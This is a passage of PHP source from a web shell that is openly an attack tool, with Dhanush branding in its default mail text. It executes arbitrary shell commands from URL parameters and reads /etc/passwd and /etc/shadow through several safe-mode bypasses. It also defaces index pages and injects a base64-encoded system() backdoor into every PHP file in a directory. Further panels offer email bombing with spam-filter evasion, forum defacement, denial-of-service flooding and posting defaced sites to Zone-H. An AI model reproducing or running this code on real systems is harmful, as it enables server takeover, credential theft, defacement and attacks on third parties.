  2685. $stream = imap_open($string, "", "");
  2686. $str = imap_body($stream, 1);
  2687. echo "</textarea>";
  2688. }
  2689. else if(isset($_GET['sql']))
  2690. {
  2691. echo "<textarea cols=120 rows=20 class=box readonly>";
  2692. $file=$_GET['sql'];
  2694. $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
  2695. $mysql_files = explode(':', $mysql_files_str);
  2697. $sql = array (
  2698. "USE $mdb",
  2699. 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
  2702. . "ESCAPED BY '' "
  2705. "SELECT a FROM $tbl LIMIT 1"
  2706. );
  2707. mysql_connect ($mhost, $muser, $mpass);
  2709. foreach ($sql as $statement) {
  2710. $q = mysql_query ($statement);
  2712. if ($q == false) die (
  2713. "FAILED: " . $statement . "\n" .
  2714. "REASON: " . mysql_error () . "\n"
  2715. );
  2717. if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
  2719. echo htmlspecialchars($r[0]);
  2720. mysql_free_result ($q);
  2721. }
  2722. echo "</textarea>";
  2723. }
  2724. else if(isset($_GET['curl']))
  2725. {
  2726. $ch=curl_init("file://" . $_GET[curl]);
  2727. curl_setopt($ch,CURLOPT_HEADERS,0);
  2728. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  2729. $file_out=curl_exec($ch);
  2730. curl_close($ch);
  2731. echo "<textarea cols=120 rows=20 class=box readonly>".htmlspecialchars($file_out)."</textarea></br></br>";
  2732. }
  2733. else if(isset($_GET['include']))
  2734. {
  2735. if(file_exists($_GET['include']))
  2736. {
  2737. echo "<textarea cols=120 rows=20 class=box readonly>";
  2738. @include($_GET['include']);
  2739. echo "</textarea>";
  2740. }
  2741. else
  2742. echo "<br><center><font size=3>Can't Read" . $_GET['include'] . "</font></center>";
  2743. }
  2744. else if(isset($_GET['id']))
  2745. {
  2746. echo "<textarea cols=120 rows=20 class=box readonly>";
  2747. for($uid=0;$uid<60000;$uid++)
  2748. { //cat /etc/passwd
  2749. $ara = posix_getpwuid($uid);
  2750. if (!empty($ara))
  2751. {
  2752. while (list ($key, $val) = each($ara))
  2753. {
  2754. print "$val:";
  2755. }
  2756. print "\n";
  2757. }
  2758. }
  2759. echo "</textarea>";
  2760. break;
  2761. }
  2762. else if(isset($_GET['tempnam']))
  2763. {
  2764. $mytmp = tempnam ( 'tmp', $_GET['tempnam'] );
  2765. $fp = fopen ( $mytmp, 'r' );
  2766. while(!feof($fp))
  2767. echo fgets($fp);
  2768. fclose ( $fp );
  2769. }
  2770. else if(isset($_GET['symlnk']))
  2771. {
  2772. echo "<textarea cols=120 rows=20 class=box readonly>";
  2773. @mkdir("mydhanush",0777);
  2774. @chdir("mydhanush");
  2775. execmd("ln -s /etc/passwd");
  2777. echo file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/mydhanush/passwd");
  2778. echo "</textarea>";
  2779. }
  2780. if(isset($_GET['newtype']))
  2781. {
  2782. $filename = $_GET['newtype'];
  2783. echo "<textarea cols=120 rows=20 class=box readonly>";
  2784. if($_GET['optiontype'] == "xxd")
  2785. echo execmd("xxd ".$filename);
  2786. else if($_GET['optiontype'] == "rev")
  2787. echo execmd("rev ".$filename);
  2788. if($_GET['optiontype'] == "tac")
  2789. echo execmd("tac ".$filename);
  2790. if($_GET['optiontype'] == "more")
  2791. echo execmd("more ".$filename);
  2792. if($_GET['optiontype'] == "less")
  2793. echo execmd("less ".$filename);
  2794. echo "</textarea>";
  2795. }
  2796. }
  2797. // Deface Website
  2798. else if(isset($_GET['deface']))
  2799. {
  2800. $myfile = fopen($_GET['deface'],'w');
  2801. if(fwrite($myfile, base64_decode($ind)))
  2802. {fclose($myfile);
  2803. echo "Index Defaced Successfully";}
  2804. else
  2805. echo "Donot have write permission";
  2806. }
  2807. else if(isset($_GET['perms']))
  2808. {
  2809. ?>
  2810. <form>
  2811. <input type="hidden" name="myfilename" value="<?php echo $_GET['myfilepath']; ?>">
  2812. <table align="center" border="1" style="width:40%;border-color:#333333;">
  2813. <tr>
  2814. <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
  2815. </tr>
  2816. <tr>
  2817. <td colspan="2" align="center" style="height:60px">
  2818. <input type="button" onClick="changeperms(chmode.value,myfilename.value)" value="Change Permission" class="but" style="padding: 5px;" /></td>
  2819. </tr>
  2820. </table>
  2822. </form>
  2823. <?php
  2824. }
  2825. else if(isset($_GET["chmode"]))
  2826. {
  2827. if($_GET['chmode'] != null && is_numeric($_GET['chmode']))
  2828. {
  2829. $perms = 0;
  2830. for($i=strlen($_GET['chmode'])-1;$i>=0;--$i)
  2831. $perms += (int)$_GET['chmode'][$i]*pow(8, (strlen($_GET['chmode'])-$i-1));
  2832. if(@chmod($_GET['myfilename'],$perms))
  2833. echo "<center><blink><font class=txt>File Permissions Changed Successfully</font></blink></center>";
  2834. else
  2835. echo "<center><blink>Cannot Change File Permissions</blink></center>";
  2836. }
  2837. }
  2838. else if(isset($_GET['rename']))
  2839. {
  2840. ?>
  2841. <form>
  2842. <table border="0" cellpadding="3" cellspacing="3">
  2843. <tr>
  2844. <td>File </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="file" class="box" /></td>
  2845. </tr>
  2846. <tr>
  2847. <td>To </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="to" class="box" /></td>
  2848. </tr>
  2849. <tr>
  2850. <td colspan="2"><input type="button" onClick="renamefun(file.value,to.value)" value="Rename It" class="but" style="margin-left: 160px;padding: 5px;"/></td>
  2851. </tr>
  2852. </table>
  2853. </form>
  2854. <?php
  2856. }
  2857. else if(isset($_GET['renamemyfile']))
  2858. {
  2859. if(isset($_GET['to']) && isset($_GET['file']))
  2860. {
  2861. if(!rename($_GET['file'], $_GET['to']))
  2862. echo "Cannot Rename File";
  2863. else
  2864. echo "<font class=txt>File Renamed Successfully</font>";
  2866. }
  2867. }
  2868. else if(isset($_GET['open']))
  2869. {
  2870. if(is_file($_GET['myfilepath']))
  2871. {
  2872. $owner = "0/0";
  2873. if($os == "Linux")
  2874. $owner = getOGid($_GET['myfilepath']);
  2875. ?>
  2876. <form>
  2877. <table style="width:57%;">
  2878. <tr align="left">
  2879. <td align="left">File : </td><td><font class=txt><?php echo $_GET['myfilepath'];?></font></td><td align="left">Permissions : </td><td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo addslashes($_GET['myfilepath']); ?>')"><?php echo filepermscolor($_GET['myfilepath']);?></a></td>
  2880. </tr>
  2881. <tr>
  2882. <td>Size : </td><td><?php echo HumanReadableFileSize(filesize($_GET['myfilepath']));?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
  2883. </tr>
  2884. </table>
  2885. <textarea name="content" rows="15" cols="100" class="box"><?php
  2886. $content = htmlspecialchars(file_get_contents($_GET['myfilepath']));
  2887. if($content)
  2888. {
  2889. echo $content;
  2890. }
  2891. else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
  2892. {
  2893. if(filesize($_GET['myfilepath']) != 0 )
  2894. {
  2895. fopen($_GET['myfilepath']);
  2896. while(!feof())
  2897. {
  2898. echo htmlspecialchars(fgets($_GET['myfilepath']));
  2899. }
  2900. }
  2901. }
  2903. ?>
  2904. </textarea><br />
  2905. <input name="save" type="button" onClick="savemyfile('<?php echo addslashes($_GET['myfilepath']); ?>',content.value)" value="Save Changes" id="spacing" class="but"/>
  2906. </form>
  2907. <?php
  2908. }
  2909. else
  2910. echo "File does not exist !!!!";
  2911. }
  2912. else if(isset($_POST['file']) && isset($_POST['content']))
  2913. {
  2914. if(file_exists($_POST['file']))
  2915. {
  2916. $handle = fopen($_POST['file'],"w");
  2917. if(fwrite($handle,$_POST['content']))
  2918. echo "<font class=txt>File Saved Successfully!</font>";
  2919. else
  2920. echo "Cannot Write into File";
  2921. }
  2922. else
  2923. {
  2924. echo "File Name Specified does not exists!";
  2925. }
  2926. }
  2927. else if(isset($_POST["SendNowToZoneH"]))
  2928. {
  2929. $hacker = $_POST['defacer'];
  2930. $method = $_POST['hackmode'];
  2931. $neden = $_POST['reason'];
  2932. $site = $_POST['domain'];
  2934. if (empty($hacker))
  2935. {
  2936. die("<center><font size=3>[-] You Must Fill the Attacker name !</font></center>");
  2937. }
  2938. elseif($method == "--------SELECT--------")
  2939. {
  2940. die("<center><font size=3>[-] You Must Select The Method !</center>");
  2941. }
  2942. elseif($neden == "--------SELECT--------")
  2943. {
  2944. die("<center><font size=3>[-] You Must Select The Reason</center>");
  2945. }
  2946. elseif(empty($site))
  2947. {
  2948. die("<center><font size=3>[-] You Must Inter the Sites List !</center>");
  2949. }
  2950. // Zone-h Poster
  2951. function ZoneH($url, $hacker, $hackmode,$reson, $site )
  2952. {
  2953. $k = curl_init();
  2954. curl_setopt($k, CURLOPT_URL, $url);
  2955. curl_setopt($k,CURLOPT_POST,true);
  2956. curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
  2957. curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
  2958. curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
  2959. $kubra = curl_exec($k);
  2960. curl_close($k);
  2961. return $kubra;
  2962. }
  2964. $i = 0;
  2965. $sites = explode("\n", $site);
  2966. echo "<pre class=ml1 style='margin-top:5px'>";
  2967. while($i < count($sites))
  2968. {
  2969. if(substr($sites[$i], 0, 4) != "http")
  2970. {
  2971. $sites[$i] = "http://".$sites[$i];
  2972. }
  2973. ZoneH("", $hacker, $method, $neden, $sites[$i]);
  2974. echo "<font class=txt size=3>Site : ".$sites[$i]." Posted !</font><br>";
  2975. ++$i;
  2976. }
  2978. echo "<font class=txt size=4>Sending Sites To Zone-H Has Been Completed Successfully !! </font></pre>";
  2979. }
  2980. else if(isset($_GET['executemycmd']))
  2981. {
  2982. $comm = $_GET['executemycmd'];
  2983. chdir($_GET['executepath']);
  2984. echo shell_exec($comm);
  2985. }
  2986. // View Passwd file
  2987. else if(isset($_GET['passwd']))
  2988. {
  2989. $test='';
  2990. $tempp= tempnam($test, "cx");
  2991. $get = "/etc/passwd";
  2992. $name=@posix_getpwuid(@fileowner($get));
  2993. $group=@posix_getgrgid(@filegroup($get));
  2994. $owner = $name['name']. " / ". $group['name'];
  2995. ?>
  2996. <table style="width:57%;">
  2997. <tr>
  2998. <td align="left">File : </td><td><font class=txt><?php echo $get; ?></font></td><td align="left">Permissions : </td><td><?php echo filepermscolor($get);?></td>
  2999. </tr>
  3000. <tr>
  3001. <td>Size : </td><td><?php echo filesize($get);?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
  3002. </tr>
  3003. </table>
  3004. <?php
  3005. if(copy("compress.zlib://".$get, $tempp))
  3006. {
  3007. $fopenzo = fopen($tempp, "r");
  3008. $freadz = fread($fopenzo, filesize($tempp));
  3009. fclose($fopenzo);
  3010. $source = htmlspecialchars($freadz);
  3011. echo "<tr><td><center><textarea rows='20' cols='80' class=box name='source'>$source</textarea><br>";
  3012. unlink($tempp);
  3013. }
  3014. else
  3015. {
  3016. ?>
  3017. <form>
  3018. <input type="hidden" name="etcpasswd">
  3019. <table class="tbl" border="1" cellpadding="5" cellspacing="5" align="center" style="width:40%;">
  3020. <tr>
  3021. <td>From : </td><td><input type="text" name="val1" class="sbox" value="1"></td>
  3022. </tr>
  3023. <tr>
  3024. <td>To : </td><td><input type="text" name="val2" class="sbox" value="1000"></td>
  3025. </tr>
  3026. <tr>
  3027. <td colspan="2" align="center"><input type="submit" value=" Go " class="but"></td>
  3028. </tr>
  3029. </table><br>
  3030. </form>
  3031. <?php
  3032. }
  3033. }
  3034. else if(isset($_GET['shadow']))
  3035. {
  3036. $test='';
  3037. $tempp= tempnam($test, "cx");
  3038. $get = "/etc/shadow";
  3039. if(copy("compress.zlib://".$get, $tempp))
  3040. {
  3041. $fopenzo = fopen($tempp, "r");
  3042. $freadz = fread($fopenzo, filesize($tempp));
  3043. fclose($fopenzo);
  3044. $source = htmlspecialchars($freadz);
  3045. echo "<tr><td><center><font size='3' face='Verdana'>$get</font><br><textarea rows='20' cols='80' class=box name='source'>$source</textarea>";
  3046. unlink($tempp);
  3047. }
  3048. }
  3049. else if(isset($_GET['bomb']))
  3050. {
  3051. ?><div id="showmail"></div>
  3052. <form>
  3053. <table id="margins" style="width:100%;">
  3054. <tr>
  3055. <td style="width:30%;">To</td>
  3056. <td>
  3057. <input class="box" name="to" value="," onFocus="if(this.value == ',')this.value = '';" onBlur="if(this.value=='')this.value=',';"/>
  3058. </td>
  3059. </tr>
  3060. <tr>
  3061. <td style="width:30%;">Subject</td>
  3062. <td>
  3063. <input type="text" class="box" name="subject" value="Dhanush Here!" onFocus="if(this.value == 'Dhanush Here!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!';" />
  3064. </td>
  3065. </tr>
  3066. <tr>
  3067. <td style="width:30%;">No. of Times</td>
  3068. <td>
  3069. <input class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';"/>
  3070. </td>
  3071. </tr>
  3072. <tr>
  3073. <td style="width:30%;">Pad your message (Less spam detection)</td>
  3074. <td><input type="checkbox" name="padding"/></td>
  3075. </tr>
  3076. <tr>
  3077. <td colspan="2"><textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!</textarea></td>
  3078. </tr>
  3079. <tr>
  3080. <td rowspan="2">
  3081. <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('dobombing',to.value,subject.value,message.value,'null',times.value,padding.value)" class="but" value=" Bomb! "/>
  3082. </td>
  3083. </tr>
  3084. </table>
  3085. </form>
  3086. <?php
  3087. }
  3089. //Mass Mailer
  3090. else if(isset($_GET['mail']))
  3091. {
  3092. ?><div id="showmail"></div>
  3093. <div align="left">
  3094. <form>
  3095. <table align="left" style="width:100%;">
  3096. <tr>
  3097. <td style="width:10%;">From</td>
  3098. <td style="width:80%;" align="left"><input name="from" class="box" value="" onFocus="if(this.value == '')this.value = '';" onBlur="if(this.value=='')this.value='';"/></td>
  3099. </tr>
  3101. <tr>
  3102. <td style="width:20%;">To</td>
  3103. <td style="width:80%;"><input class="box" class="box" name="to" value="," onFocus="if(this.value == ',')this.value = '';" onBlur="if(this.value=='')this.value=',';"/></td>
  3104. </tr>
  3106. <tr>
  3107. <td style="width:20%;">Subject</td>
  3108. <td style="width:80%;"><input type="text" class="box" name="subject" value="Dhanush Here!!" onFocus="if(this.value == 'Dhanush Here!!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!!';" /></td>
  3109. </tr>
  3112. <tr>
  3113. <td colspan="2">
  3114. <textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!!</textarea>
  3115. </td>
  3116. </tr>
  3119. <tr>
  3120. <td rowspan="2">
  3121. <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('massmailing',to.value,subject.value,message.value,from.value)" class="but" value=" Send! "/>
  3122. </td>
  3123. </tr>
  3124. </table>
  3125. </form></div>
  3126. <?php
  3127. }
  3128. // Get Domains
  3129. else if(isset($_REQUEST["symlinkserver"]))
  3130. {
  3131. ?>
  3132. <center><table><tr>
  3133. <td><a href=javascript:void(0) onClick="getdata('domains')"><font class=txt><b>| Get Domains |</b></font></a></td>
  3134. <td><a href=javascript:void(0) onClick="getdata('symlink')"><font class=txt><b>| Symlink Server |</b></font></a></td>
  3135. <td><a href=javascript:void(0) onClick="getdata('symlinkfile')"><font class=txt><b>| Symlink File |</b></font></a></td>
  3136. <td><a href=javascript:void(0) onClick="getdata('script')"><font class=txt><b>| Script Locator |</b></font></a></td>
  3137. </tr></table></center><br>
  3138. <div id="showdata"></div><?php
  3139. }
  3140. // Forum Manager
  3141. else if(isset($_REQUEST["forum"]))
  3142. { ?>
  3143. <center><table><tr><td><a href=# onClick="getdata('defaceforum')"><font class=txt size="4">| Forum Defacer |</font></a></td>
  3144. <td><a href=# onClick="getdata('passwordchange')"><font class=txt size="4">| Forum Password Changer |</font></a></td>
  3145. </tr></table></center><br><div id="showdata"></div>
  3146. <?php
  3147. }
  3148. // Sec info
  3149. else if(isset($_GET['secinfo']))
  3150. { ?><div id=showdata></div>
  3151. <center><div id="showmydata"></div>
  3152. </center>
  3153. <br><center><font color =red size=5>Server security information</font><br><br></center>
  3154. <table style="width:100%;border-color:#333333;" border="1">
  3155. <tr>
  3156. <td style="width:7%;">Curl</td>
  3157. <td style="width:7%;">Oracle</td>
  3158. <td style="width:7%;">MySQL</td>
  3159. <td style="width:7%;">MSSQL</td>
  3160. <td style="width:7%;">PostgreSQL</td>
  3161. <td style="width:12%;">Open Base Directory</td>
  3162. <td style="width:10%;">Safe_Exec_Dir</td>
  3163. <td style="width:7%;">PHP Version</td>
  3164. <td style="width:7%;">Magic Quotes</td>
  3165. <td style="width:7%;">Server Admin</td>
  3166. </tr>
  3167. <tr>
  3168. <td style="width:7%;"><font class="txt"><?php curlinfo(); ?></font></td>
  3169. <td style="width:7%;"><font class="txt"><?php oracleinfo(); ?></font></td>
  3170. <td style="width:7%;"><font class="txt"><?php mysqlinfo(); ?></font></td>
  3171. <td style="width:7%;"><font class="txt"><?php mssqlinfo(); ?></font></td>
  3172. <td style="width:7%;"><font class="txt"><?php postgresqlinfo(); ?></font></td>
  3173. <td style="width:12%;"><font class="txt"><?php echo $basedir; ?></font></td>
  3174. <td style="width:10%;"><font class="txt"><?php if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font >NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};} ?></font></td>
  3175. <td style="width:7%;"><font class="txt"><?php phpver(); ?></font></td>
  3176. <td style="width:7%;"><font class="txt"><?php magic_quote(); ?></font></td>
  3177. <td style="width:7%;"><font class="txt"><?php serveradmin(); ?></font></td>
  3178. </tr>
  3179. </table><br> <?php
  3180. mysecinfo();
  3181. }
  3182. // Code Injector
  3184. else if(isset($_GET['injector']))
  3185. {
  3186. ?>
  3187. <form method='POST'>
  3188. <table id="margins">
  3189. <tr>
  3190. <td width="100" class="title">
  3191. Directory
  3192. </td>
  3193. <td>
  3194. <input class="box" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>" />
  3195. </td>
  3197. </tr>
  3198. <tr>
  3199. <td class="title">
  3200. Mode
  3201. </td>
  3202. <td>
  3203. <select style="width: 400px;" name="mode" class="box">
  3204. <option value="Apender">Apender</option>
  3205. <option value="Overwriter">Overwriter</option>
  3206. </select>
  3207. </td>
  3208. </tr>
  3209. <tr>
  3210. <td class="title">
  3211. File Type
  3212. </td>
  3213. <td>
  3214. <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
  3215. </td>
  3216. </tr>
  3217. <tr>
  3218. <td>Create A backdoor by injecting this code in every php file of current directory</td>
  3219. </tr>
  3221. <tr>
  3222. <td colspan="2">
  3223. <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode("PD9waHAgJGNtZCA9IDw8PEVPRA0KY21kDQpFT0Q7DQoNCmlmKGlzc2V0KCRfUkVRVUVTVFskY21kXSkpIHsNCnN5c3RlbSgkX1JFUVVFU1RbJGNtZF0pOyB9ID8+"); ?></textarea>
  3224. </td>
  3225. </tr>
  3226. <tr>
  3227. <td rowspan="2">
  3228. <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="codeinjector(pathtomass.value,mode.value,filetype.value,injectthis.value)" class="but" value="Inject "/>
  3229. </td>
  3230. </tr>
  3231. </form>
  3232. </table><div id="showinject"</div>
  3233. <?php
  3234. }
  3235. // Bypass
  3236. else if(isset($_GET["bypass"]))
  3237. {
  3238. ?><center><div id="showbyp"></div></center>
  3239. <table cellpadding="7" align="center" border="3" style="width:70%;border-color:#333333;">
  3240. <tr>
  3241. <td align="center" colspan="2"><font color="#FF0000" size="3">Safe mode bypass</font></td>
  3242. </tr>
  3243. <tr>
  3244. <td align="center">
  3245. <p>Using copy() function</p>
  3246. <form onSubmit="bypassfun('copy',copy.value);return false;">
  3247. <input type="text" name="copy" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('copy',copy.value)" value="bypass" class="but">
  3248. </form>
  3249. </td>
  3250. <td align="center">
  3251. <p>Using imap() function</p>
  3252. <form onSubmit="bypassfun('imap',imap.value);return false;">
  3253. <input type="text" name="imap" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('imap',imap.value)" value="bypass" class="but">
  3254. </form>
  3255. </td>
  3256. </tr>
  3258. <tr>
  3259. <td align="center">
  3260. <p>Using sql() function</p>
  3261. <form onSubmit="bypassfun('sql',sql.value);return false;">
  3262. <input type="text" name="sql" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('sql',sql.value)" value="bypass" class="but">
  3263. </form>
  3264. </td>
  3265. <td align="center">
  3266. <p>Using Curl() function</p>
  3267. <form onSubmit="bypassfun('curl',curl.value);return false;">
  3268. <input type="text" name="curl" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('curl',curl.value)" value="bypass" class="but">
  3269. </form>
  3270. </td>
  3271. </tr>
  3273. <tr>
  3274. <td align="center">
  3275. <p>Bypass using include()</p>
  3276. <form onSubmit="bypassfun('include',include.value);return false;">
  3277. <input type="text" name="include" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('include',include.value)" value="bypass" class="but">
  3278. </form>
  3279. </td>
  3280. <td align="center">
  3281. <p>Using id() function</p>
  3282. <form onSubmit="bypassfun('id',id.value);return false;">
  3283. <input type="text" name="id" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('id',id.value)" value="bypass" class="but">
  3284. </form>
  3285. </td>
  3286. </tr>
  3288. <tr>
  3289. <td align="center">
  3290. <p>Using tempnam() function</p>
  3291. <form onSubmit="bypassfun('tempnam',tempname.value);return false;">
  3292. <input type="text" name="tempname" value="../../../etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('tempnam',tempname.value)" value="bypass" class="but">
  3293. </form>
  3294. </td>
  3295. <td align="center">
  3296. <p>Using symlink() function</p>
  3297. <form onSubmit="bypassfun('symlnk',sym.value);return false;">
  3298. <input type="text" name="sym" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('symlnk',sym.value)" value="bypass" class="but">
  3299. </form>
  3300. </td>
  3301. </tr>
  3302. <tr>
  3303. <td colspan=2 align="center">
  3304. <p>Using Bypass function</p>
  3305. <form onSubmit="bypassfun('newtype',newtype.value,optiontype.value);return false;">
  3306. <input type="text" name="newtype" value="/etc/passwd" class="sbox">
  3307. <select id="optiontype" class=sbox>
  3308. <option value="tac">tac</option>
  3309. <option value="more">more</option>
  3310. <option value="less">less</option>
  3311. <option value="rev">rev</option>
  3312. <option value="xxd">xxd</option>
  3313. </select>
  3314. <input type="button" OnClick="bypassfun('newtype',newtype.value,optiontype.value)" value="bypass" class="but">
  3315. </form>
  3316. </td>
  3317. </tr>
  3318. </table>
  3319. </form>
  3320. <?php
  3321. }
  3322. //fuzzer
  3323. else if(isset($_GET['fuzz']))
  3324. {
  3325. ?>
  3326. <form method="GET">
  3327. <table id="margins">
  3328. <tr>
  3329. <td width="400" class="title">
  3330. IP
  3331. </td>
  3332. <td>
  3333. <input class="box" name="myip" value="" onFocus="if(this.value == '')this.value = '';" onBlur="if(this.value=='')this.value='';"/>
  3334. </td>
  3335. </tr>
  3337. <tr>
  3338. <td class="title">
  3339. Port
  3340. </td>
  3341. <td>
  3342. <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
  3343. </td>
  3344. </tr>
  3346. <tr>
  3347. <td class="title">
  3348. Timeout
  3349. </td>
  3350. <td>
  3351. <input type="text" class="box" name="time" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';"/>
  3352. </td>
  3353. </tr>
  3356. <tr>
  3357. <td class="title">
  3358. No of times
  3359. </td>
  3360. <td>
  3361. <input type="text" class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';" />
  3362. </td>
  3363. </tr>
  3365. <tr>
  3366. <td class="title">
  3367. Message (The message Should be long and it will be multiplied with the value after it)
  3368. </td>
  3369. <td>
  3370. <input class="box" name="message" value="%S%x--Some Garbage here --%x%S" onFocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onBlur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
  3371. </td>
  3372. <td>
  3373. x
  3374. </td>
  3375. <td width="20">
  3376. <input style="width: 30px;" class="box" name="messageMultiplier" value="10" />
  3377. </td>
  3378. </tr>
  3380. <tr>
  3381. <td rowspan="2">
  3382. <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('fuzzer',myip.value,port.value,time.value,times.value,message.value,messageMultiplier.value)" class="but" value=" Submit "/>
  3383. </td>
  3384. </tr>
  3385. </table>
  3386. </form><div id="showdos"></div>
  3387. <?php
  3388. }
  3389. // Zone-h Poster
  3390. else if(isset($_GET["zone"]))
  3391. {
  3392. if(!function_exists('curl_version'))
  3393. {
  3394. echo "<pre style='margin-top:5px'><center><font >PHP CURL NOT EXIST</font></center></pre>";
  3395. }
  3396. ?>
  3397. <center><font size="4" color="#FF0000">Zone-h Poster</font></center>
  3398. <form action="<?php echo $self; ?>" method="post">
  3399. <table align="center" cellpadding="5" border="0">
  3400. <tr>
  3401. <td>
  3402. <input type="text" name="defacer" value="Attacker" class="box" /></td></tr>
  3403. <tr><td>
  3404. <select name="hackmode" class="box">
  3405. <option >--------SELECT--------</option>
  3406. <option value="1">known vulnerability (i.e. unpatched system)</option>
  3407. <option value="2" >undisclosed (new) vulnerability</option>
  3408. <option value="3" >configuration / admin. mistake</option>
  3409. <option value="4" >brute force attack</option>
  3410. <option value="5" >social engineering</option>
  3411. <option value="6" >Web Server intrusion</option>
  3412. <option value="7" >Web Server external module intrusion</option>
  3413. <option value="8" >Mail Server intrusion</option>
  3414. <option value="9" >FTP Server intrusion</option>
  3415. <option value="10" >SSH Server intrusion</option>
  3416. <option value="11" >Telnet Server intrusion</option>
  3417. <option value="12" >RPC Server intrusion</option>
  3418. <option value="13" >Shares misconfiguration</option>
  3419. <option value="14" >Other Server intrusion</option>
  3420. <option value="15" >SQL Injection</option>
  3421. <option value="16" >URL Poisoning</option>
  3422. <option value="17" >File Inclusion</option>
  3423. <option value="18" >Other Web Application bug</option>
  3424. <option value="19" >Remote administrative panel access bruteforcing</option>
  3425. <option value="20" >Remote administrative panel access password guessing</option>
  3426. <option value="21" >Remote administrative panel access social engineering</option>
  3427. <option value="22" >Attack against administrator(password stealing/sniffing)</option>
  3428. <option value="23" >Access credentials through Man In the Middle attack</option>
  3429. <option value="24" >Remote service password guessing</option>
  3430. <option value="25" >Remote service password bruteforce</option>
  3431. <option value="26" >Rerouting after attacking the Firewall</option>
  3432. <option value="27" >Rerouting after attacking the Router</option>
  3433. <option value="28" >DNS attack through social engineering</option>
  3434. <option value="29" >DNS attack through cache poisoning</option>
  3435. <option value="30" >Not available</option>
  3436. </select>
  3437. </td></tr>
  3438. <tr><td>
  3439. <select name="reason" class="box">
  3440. <option >--------SELECT--------</option>
  3441. <option value="1" >Heh...just for fun!</option>
  3442. <option value="2" >Revenge against that website</option>
  3443. <option value="3" >Political reasons</option>
  3444. <option value="4" >As a challenge</option>
  3445. <option value="5" >I just want to be the best defacer</option>
  3446. <option value="6" >Patriotism</option>
  3447. <option value="7" >Not available</option>
  3448. </select></td></tr>
  3449. <tr><td>
  3450. <textarea name="domain" class="box" cols="47" rows="9">List Of Domains</textarea></td></tr>
  3451. <tr><td>
  3452. <input type="button" onClick="zoneh(defacer.value,hackmode.value,reason.value,domain.value)" class="but" value="Send Now !" /></td></tr></table>
  3453. </form><div id="showzone"></div>
  3454. <?php }
  3455. //DDos
  3456. else if(isset($_GET['dos']))
  3457. {
  3458. ?>
  3459. <form method="GET">
  3460. <table id="margins">
  3461. <tr>
  3462. <td width="400" class="title">
  3463. IP
  3464. </td>
  3465. <td>
  3466. <input class="box" name="myip" value="" onFocus="if(this.value == '')this.value = '';" onBlur="if(this.value=='')this.value='';"/>
  3467. </td>
  3468. </tr>
  3470. <tr>
  3471. <td class="title">
  3472. Port
  3473. </td>
  3474. <td>
  3475. <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
  3476. </td>
  3477. </tr>
  3479. <tr>
  3480. <td class="title">
  3481. Timeout <font >(Time in seconds)</font>
  3482. </td>
  3483. <td>
  3484. <input type="text" class="box" name="timeout" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';" />
  3485. </td>
  3486. </tr>
  3487. <tr>
  3488. <td class="title">
  3489. Execution Time <font >(Time in seconds)</font>
  3490. </td>
  3491. <td>
  3492. <input type="text" class="box" name="exTime" value="10" onFocus="if(this.value == '10')this.value = '';" onBlur="if(this.value=='')this.value='10';"/>
  3493. </td>
  3494. </tr>
  3495. <tr>
  3496. <td class="title">
  3497. No of Bytes per/packet
  3498. </td>
  3499. <td>
  3500. <input type="text" class="box" name="noOfBytes" value="999999" onFocus="if(this.value == '999999')this.value = '';" onBlur="if(this.value=='')this.value='999999';"/>
  3501. </td>
  3502. </tr>
  3503. <tr>
  3504. <td rowspan="2">
